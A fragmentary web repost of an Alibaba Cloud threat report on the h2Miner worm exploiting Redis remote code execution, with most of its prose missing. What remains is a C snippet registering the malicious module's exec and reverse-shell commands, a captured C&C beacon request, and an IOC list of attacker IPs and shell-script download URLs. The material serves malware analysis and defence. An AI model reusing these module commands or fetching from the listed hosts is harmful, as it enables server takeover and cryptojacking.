New Outbreak of h2Miner Worms Exploiting Redis RCE Detected

H2Miner Gang

Redis RCE

Worm Analysis

if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
  • Download the file and execute
  • Execute the mining program
  • Maintain C&C communication and execute commands
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip

Other Attack Methods

IOC

142.44.191.122/t.sh
185.92.74.42/h.sh
142.44.191.122/spr.sh
142.44.191.122/spre.sh
195.3.146.118/unk.sh
45.10.88.102
91.215.169.111
139.99.50.255
46.243.253.167
195.123.220.193

Security Advice

Original Source:

--

--

--

Follow me to keep abreast with the latest technology news, industry insights, and developer trends. Alibaba Cloud website:https://www.alibabacloud.com

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

{UPDATE} Greedy Picks Hack Free Resources Generator

{UPDATE} Idle Endless Fight Hack Free Resources Generator

How to turn CORS misconfig to bounty

Coming Soon: Nextform, an API for Collecting Official Forms

When Miller Met Rabin — Magic Happened …

Zero-Trust Security — Part 1: How Is Zero-Trust Security Helpful for the Cloud?

Blue 🌀 TryHackMe | Walkthrough

The Philosophy of ATT&CK

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Alibaba Cloud

Alibaba Cloud

Follow me to keep abreast with the latest technology news, industry insights, and developer trends. Alibaba Cloud website:https://www.alibabacloud.com

More from Medium

Enabling High Fidelity, Low Latency Live Streaming with NGINX

GitOps with flux2

Docker client to enable Dynamic DNS with Namecheap

Secure your Cloud Native application with IBM Cloud App ID